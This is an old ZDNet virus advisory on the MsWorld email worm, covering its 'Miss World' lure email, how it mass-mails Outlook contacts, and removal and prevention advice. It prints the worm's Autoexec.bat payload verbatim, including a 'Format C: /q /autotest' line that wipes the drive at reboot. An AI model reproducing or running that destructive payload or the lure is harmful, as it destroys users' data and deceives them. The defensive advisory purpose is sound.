Help and How-To: Dealing with the MsWorld virus

Virus alarm as Miss World spreads: This 'cute' Flash image not only floods your Outlook contacts with mail, but it might erase your C: drive as well
Written by Robert Vamosi, Contributor

Borrowing from the success of NakedWife, a new worm, MsWorld, displays a Flash window illustration while mass mailing everyone you know and attempting to reformat your C: drive. MsWorld (w32.MsWorld@mm) hails from the UK and at this time, it has not spread very far or very fast. Since it can clog email servers and damage users' root drive files, MsWorld ranks as a 6 on the ZDNet Virus Meter.

How it works

MsWorld arrives as an email with the following information:

Subject: Miss World

Body: Hi, (your name)

Enjoy the latest pictures of Miss World from various Country

Attached: MWrld.exe

If a user clicks on the attached file, a Flash window appears that displays a cute animal and big cake with a single candle. The text, "I fall more in love with you each day!", appears in script at the bottom of the window. While this image displays, MsWorld sends copies of itself to all address found in Outlook's address book.

MsWorld adds the following to the infected computer's Autoexec.bat, which causes the computer to reformat the C: drive whenver it is next rebooted:

Echo Off

Echo "This Everything for my Girl Friend.........,

(CatEyes, KRSSL, SS Hostel) "

Format C: /q /autotest

Echo On

MsWorld also attempts to delete the files USER.DAT, USER.DA0, SYSTEM.DAT, and SYSTEM.DA0 when the Flash program is closed. Since the .dat files are in use, a run-time error will occur so only the .DA0 files are deleted.

Removal and prevention A few antivirus software companies have updated their signature files to include MsWorld. For more information on removing MsWorld from your system, see Symantec and McAfee.


Here are the basic steps for containing the latest worm:

Download Microsoft's Outlook Security Patch. If you haven't already installed it, download the Outlook 98 Security Patch or the Outlook 2000 Security Patch. Please note that this patch does not include Outlook Express. Click here for help with installation, or for more information regarding this patch.

Turn off Windows Scripting Host. Recent virus outbreaks have exploited known vulnerabilities in Visual Basic Scripting under Windows. To limit your risk of infection, you should turn off Windows Scripting Host. For a complete discussion of the pros and cons of removing Windows Scripting Host, read this article: To script or not to script.

"Don't open attachments!" One of the best ways to prevent virus infections is not to open attachments, especially when viruses such as this virus are being actively circulated. Even if the email is from a known source, be careful. A few viruses take the mailing lists from an infected computer and send out new messages with its destructive payload attached. Always scan the attached files first for viruses. Unless it's a file or an image you are expecting, delete it.

Stay informed. Did you know that there are virus and security alerts almost every day? Keep up-to-date on breaking viruses and solutions by bookmarking our Viruses, Bugs, Security Alerts page.

Get protected. If you don't already have virus protection software on your machine, you should. If you're a home or individual user, it's as easy as downloading any of these top-rated programs then following the installation instructions. If you're on a network, check with your network administrator first.

Scan your system regularly. If you're just loading anti-virus software for the first time, it's a good idea to let it scan your entire system. It's better to start with your PC clean and free of virus problems. Often the antivirus program can be set to scan each time the computer is rebooted or on a periodic schedule. Some will scan in the background while you are connected to the Internet. Make it a regular habit to scan for viruses.

Update your antivirus software. Now that you have virus protection software installed, make sure it's up-to-date. Some antivirus protection programs have a feature that will automatically link to the Internet and add new virus detection code whenever the software vendor discovers a new threat. You can also scan your system for the lastest security updates here.

Is your PC safe? Find out in ZDNet UK's Viruses and Hacking News Section.

Have your say instantly, and see what others have said. Click on the TalkBack button and go to the Security forum.

Let the editors know what you think in the Mailroom. And read other letters.

Editorial standards